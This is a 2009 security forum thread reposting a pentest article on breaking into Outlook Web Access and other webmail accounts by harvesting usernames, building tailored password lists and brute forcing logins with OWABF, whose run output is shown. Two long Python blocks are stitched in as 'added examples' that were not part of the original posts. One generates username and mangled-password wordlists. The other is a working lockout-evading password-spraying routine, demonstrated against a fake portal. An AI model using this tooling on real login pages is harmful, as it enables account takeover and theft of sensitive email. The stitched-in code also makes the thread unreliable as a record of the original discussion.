
Attacking outlook web portals


Jhaddix


Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Aug 24, 2009 2:57 pm

Attacking outlook web portals

From a co-worker of mine at Redspin, working links at the site:

http://www.redspin.com/blog/2009/08/04/ ... -accounts/

Webmail is absolutely everywhere.  I rarely come across a corporate network that doesn’t have Outlook Web Access, Groupwise, or some other variant of webmail listening.  Being able to get at email accounts from the Internet can save employees a lot of time and headache, but using those accounts with weak passwords can result in an even larger headache.  Knowing how the majority of the planet uses email (sending some pretty sensitive data) this creates a large risk for most any company.  I’ll run through a quick list of tools and processes that I use to test the strength of webmail logins.

The first part of any password attack is gathering valid usernames.  For attacks against webmail, this usually means scouring the target’s web sites looking for either specific usernames, or the naming structure for their accounts.  The latter is easy – you can dig through the target's website and collect names of employees, and rewrite them to fit the company’s standard account naming policy (Joe User becomes joe.user, juser, joeuser, etc).  There are also some tools that automate the gathering of this information:

Metagoofil – Metagoofil will search a particular domain or website, download all the documents from it, and parse the metadata looking for usernames, internal file locations, and lots of other info.  You can get an absolutely incredible amount of information from metadata.
FOCA – Much like Metagoofil, but appears to strip out even more information from documents.  This tool recently debuted at Defcon17.
theHarvester – This tool also does a good job of utilizing search engines to gather email addresses and usernames.  It searches social networking sites, the PGP key repositories, and uses general search engine tactics as well.
There are many other ways to enumerate usernames from public resources,  but these tools should give a good starting point.  Use them in combination along with some manual searching to create a username list.

Once we have our list of users, we can move on to creating a password list.  There are many ways to construct a valid password list for a specific target.  I like to start by grabbing the DPL (Default Password List) and stripping out any vendor specific stuff.  I'll then add in the old favorites such as all the variations on Password1.  Then, I'll start looking for some more specific words.  I'll do some research on the target, and include things like the business name, local sports teams, addresses and universities.  I'll then use an application like John the Ripper to run permutations on the list we just created.  John lets you specify custom permutation rules, and can take the word ‘redspin’ and output redspin, Redspin, red-spin, redspin1, Red-spin1, etc.

Now that we have some valid usernames and a relevant password list, we can move into the attack.  There are a few tools to help automate password attacks against webmail login pages, and the few that exist are quite handy:

OWABF – Outlook Web Access Brute Force.  A nice script that automates attacks against Outlook Web Access.
WMAT – Web Mail Auth Tool.  A tool that supports multiple ‘patterns’ for setting up attacks against different webmail services.  It currently includes patterns for horde, hordeIMP, kerio, mdaemon and squirrelmail.  The structure is pretty easy to write new patterns for if you need to test a unique login page.
That’s all there is to it.  We have collected valid usernames from the target, created some customized password lists, and have listed some tools you can use to tie it all together.  One thing to keep in mind is the use of lockout policies.  The last thing you want to do is lock out a bunch of live email accounts, so unless you know the lockout threshold (if there is one), you might want to limit the password guesses per account to something sane.


  Code:
$ python owabf.py -s https://webmail.example.com -u userlist -p top100.pass
***********************************
***    OWA Brute Forcer    ***
***    OWABF v 1.3        ***
***    Dejan Levaja        ***
***    http://www.netsec.rs    ***
***    dejan.levaja@netsec.rs    ***
***********************************
Outlook Web Access Brute Forcer
Login unsuccessful
joe.user    654321
Login unsuccessful
joe.user    abc12345
Login unsuccessful
joe.user    123456
Login unsuccessful
joe.user    Password?
Login unsuccessful
joe.user    password
Login unsuccessful
joe.user    welcome1
Login unsuccessful
joe.user    Password1
Login unsuccessful
joe.user    Mailbox1
...
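The username and password list construction described in the post above, worked through as an added example (not code from the post, from Redspin or from any of the tools it names). The employee names and seed words are constructed here; the account-naming schemes and the "redspin -> Redspin, red-spin, redspin1, Red-spin1" style permutations are a small hand-written imitation of what John the Ripper wordlist rules produce, not John's own rule engine:

```python
import re

# Constructed sample input for this example: names as you might scrape them from a
# target's "about us" page. These are made-up people, not anyone from the original post.
EMPLOYEES = ["Joe User", "Mary Ann Smith", "Robert O'Neil"]

# Seed words gathered the way the post describes: a trimmed default-password list plus
# target-specific words (company name, local team, town). All constructed here.
SEED_WORDS = ["password", "welcome", "redspin", "bears"]


def username_candidates(full_name):
    """Rewrite a display name into the account-naming schemes companies commonly use,
    e.g. 'Joe User' -> joe.user, juser, joeuser, ...  Middle names are dropped and
    punctuation (O'Neil) is stripped before the rewrite."""
    parts = re.sub(r"[^a-z ]", "", full_name.lower()).split()
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]
    forms = [
        f"{first}.{last}",       # joe.user
        f"{first[0]}{last}",     # juser
        f"{first}{last}",        # joeuser
        f"{first}_{last}",       # joe_user
        f"{last}{first[0]}",     # userj
        f"{first}.{last[0]}",    # joe.u
        f"{first[0]}.{last}",    # j.user
    ]
    return _dedupe(forms)


def mangle(word):
    """Hand-written imitation of a few John the Ripper wordlist rules: case toggles,
    a hyphen inserted at the midpoint of the word, and common digit/symbol suffixes.
    'redspin' -> redspin, Redspin, red-spin, redspin1, Red-spin1, ...
    John's own rule syntax is far richer; this only shows the shape of the output."""
    stems = [word, word.capitalize(), word.upper()]
    if len(word) >= 4:
        mid = len(word) // 2
        hyphenated = word[:mid] + "-" + word[mid:]
        stems += [hyphenated, hyphenated.capitalize()]
    suffixes = ["", "1", "!", "123", "1!"]
    return _dedupe(stem + suffix for stem in stems for suffix in suffixes)


def build_wordlists(names, seeds):
    """Return (usernames, passwords): every naming-scheme candidate for every name,
    and every mangled form of every seed word, each list ordered and duplicate-free."""
    users = _dedupe(u for name in names for u in username_candidates(name))
    passwords = _dedupe(p for seed in seeds for p in mangle(seed))
    return users, passwords


def _dedupe(items):
    """Order-preserving de-duplication (a plain set would scramble the try order,
    and try order matters once you are rationing guesses per account)."""
    seen = set()
    out = []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


if __name__ == "__main__":
    users, passwords = build_wordlists(EMPLOYEES, SEED_WORDS)
    print(f"{len(users)} usernames, {len(passwords)} passwords")
    print(users)
    print(mangle("redspin"))
```

The two lists come out in the order they were generated, most likely forms first, which is what you want when only the first few guesses per account are going to be used.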

Bane

Post Mon Aug 24, 2009 3:05 pm

Re: Attacking outlook web portals

Nice article. Some interesting tools there for sure, like FOCA and the webmail scripts.

jason


Hero Member

Posts: 1013

Joined: Sat Jun 21, 2008 6:23 pm

Location: USA

Post Mon Aug 24, 2009 7:47 pm

Re: Attacking outlook web portals

Good one J. I hadn't seen OWABF before, have to check it out. Does your co-worker post here?

Jhaddix


Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Aug 24, 2009 8:05 pm

Re: Attacking outlook web portals

No, not currently, but I'll give him the nudge to come over :P

Ketchup


Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Aug 24, 2009 9:42 pm

Re: Attacking outlook web portals

It would be pretty easy to modify the script to rotate users to help with lockout issues.  Perhaps attempt 2 guesses per user and then move on.  This would be particularly effective for larger organizations.  It looks like there is already a wait period incorporated.

This is pretty funny:

  Code:
# TODO:
# Learn Python :)


I am in the same boat.  I would write this using CURL and something other than python :)

Very nice script and very simple. 
~~~~~~~~~~~~~~
Ketchup
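The lockout caveat at the end of the article (cap the guesses per account) and Ketchup's suggestion of rotating through users two guesses at a time, combined into one added example. This is not OWABF and not code from anyone in the thread: the login target is a constructed in-memory stand-in for an OWA portal (the accounts, passwords and lockout threshold of 5 are made up), so the example runs offline and can show what happens both when the per-account cap stays under the threshold and when it does not:

```python
import time
from collections import defaultdict


class FakeOwaPortal:
    """Constructed stand-in for an OWA login page so the example runs offline.
    The valid credentials and the lockout threshold are made up for this demo."""

    def __init__(self, valid_creds, lockout_threshold):
        self.valid = valid_creds
        self.threshold = lockout_threshold
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, user, password):
        """True on success, False otherwise. Models an account lockout policy:
        once an account reaches the failure threshold it is locked, and even the
        correct password is refused from then on (the outcome the article warns about)."""
        if user in self.locked:
            return False
        if self.valid.get(user) == password:
            self.failures[user] = 0
            return True
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return False


def spray(login, users, passwords, guesses_per_user, guesses_per_round=2,
          round_delay=0.0, sleep=time.sleep):
    """Lockout-aware guessing: try guesses_per_round passwords against a user, move on
    to the next user, and pause round_delay seconds between rounds so attempts on any
    one account are spread out in time. No account ever receives more than
    guesses_per_user attempts, so set that below the target's lockout threshold (or a
    conservative guess at it). Returns ({user: password} hits, {user: attempts made})."""
    if guesses_per_round > guesses_per_user:
        raise ValueError("guesses_per_round must not exceed guesses_per_user")
    found = {}
    attempts = defaultdict(int)
    pending = list(users)
    pos = 0  # every user in a round gets the same slice of the password list
    while pending and pos < len(passwords):
        batch = passwords[pos:pos + guesses_per_round]
        for user in list(pending):
            for pw in batch:
                if attempts[user] >= guesses_per_user:
                    break
                attempts[user] += 1
                if login(user, pw):
                    found[user] = pw
                    break
            if user in found or attempts[user] >= guesses_per_user:
                pending.remove(user)  # cracked, or out of safe guesses: leave it alone
        pos += guesses_per_round
        if pending and pos < len(passwords) and round_delay:
            sleep(round_delay)
    return found, dict(attempts)


# Constructed demo data: made-up accounts, passwords and a lockout threshold of 5.
USERS = ["joe.user", "mary.smith", "bob.jones"]
PASSWORDS = ["123456", "password", "Password1", "welcome1", "Welcome1", "Mailbox1"]
VALID = {"joe.user": "Password1", "mary.smith": "Welcome1"}


def demo(guesses_per_user):
    """Run one spray against a fresh fake portal; returns (found, attempts, locked)."""
    portal = FakeOwaPortal(VALID, lockout_threshold=5)
    found, attempts = spray(portal.login, USERS, PASSWORDS,
                            guesses_per_user=guesses_per_user, guesses_per_round=2)
    return found, attempts, set(portal.locked)


if __name__ == "__main__":
    # Capped at 4 guesses per account: joe.user falls, mary.smith's password is never
    # reached, and nobody is locked out.
    print(demo(4))
    # A cap of 6 exceeds the threshold of 5: mary.smith falls too, but bob.jones is
    # locked out, which is exactly the noise you do not want on a live mail system.
    print(demo(6))
```

The trade-off the two runs show is the whole point of the cap: with it under the threshold you may miss a weak password that sits further down the list, without it you lock out real users. When the threshold is unknown, a low cap plus a real delay between rounds (hours, if the policy might use a long observation window) is the safer choice.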

UNIX


Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Tue Aug 25, 2009 12:20 am

Re: Attacking outlook web portals

Thanks for sharing, Jhaddix. Some more tools which caught my attention.
